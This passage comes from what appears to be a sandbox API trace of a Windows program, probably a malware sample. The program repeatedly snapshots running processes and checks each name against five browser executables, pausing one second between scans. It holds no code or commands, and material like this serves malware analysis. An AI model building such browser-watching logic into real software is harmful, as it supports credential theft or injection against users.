(lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.522] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0246.522] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0246.522] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0246.522] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0246.522] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0246.522] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.522] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0246.523] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0246.523] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0246.523] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0246.523] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0246.523] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.523] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0246.524] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0246.524] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0246.524] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0246.524] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0246.524] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.524] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0246.524] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0246.524] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0246.524] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0246.524] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0246.524] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.524] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.525] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0246.525] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0246.525] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0246.525] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0246.525] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.525] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.525] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.525] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.525] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.525] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.525] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.525] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0246.526] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0246.526] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0246.526] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0246.526] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0246.526] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.526] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.526] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.526] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.526] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.527] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.527] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.527] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0246.527] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0246.527] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0246.527] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0246.527] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0246.527] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.527] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.528] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.528] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.528] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.528] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0246.528] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.528] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0246.528] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0246.528] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0246.528] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0246.528] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0246.528] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.528] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.529] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0246.529] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0246.529] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0246.529] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0246.529] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.529] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.529] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.529] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.529] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.529] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0246.529] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.529] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.530] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.530] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.530] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.530] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0246.530] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.530] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.530] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.531] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0246.531] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.531] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0246.532] CloseHandle (hObject=0xe8) returned 1 [0246.532] Sleep (dwMilliseconds=0x3e8) [0247.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0247.535] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.536] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0247.536] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0247.536] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0247.536] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0247.536] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0247.536] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.536] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0247.536] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0247.536] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0247.536] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0247.536] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0247.537] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.537] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0247.537] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0247.537] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0247.537] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0247.537] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.537] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.538] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0247.538] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0247.538] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0247.538] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0247.538] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.538] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0247.538] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0247.538] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0247.538] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0247.538] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.539] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0247.539] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0247.539] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0247.539] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0247.539] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.539] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.539] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0247.539] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0247.539] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0247.539] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0247.539] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.539] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.540] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0247.540] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0247.540] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0247.540] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0247.540] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.540] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.540] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0247.540] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0247.540] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0247.540] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0247.541] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.541] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0247.541] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0247.541] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0247.541] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0247.541] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0247.541] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.541] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.542] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.542] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.542] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.543] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.543] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.543] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.544] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.544] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.544] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.544] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.544] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.544] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.544] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0247.545] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0247.545] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0247.545] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0247.545] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.545] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.545] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.545] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.545] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.545] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.545] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.545] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.546] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.546] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.546] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.546] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.546] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.546] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.546] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0247.546] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0247.546] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0247.546] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0247.546] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.546] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.547] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0247.547] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0247.547] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0247.547] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0247.547] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.547] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, 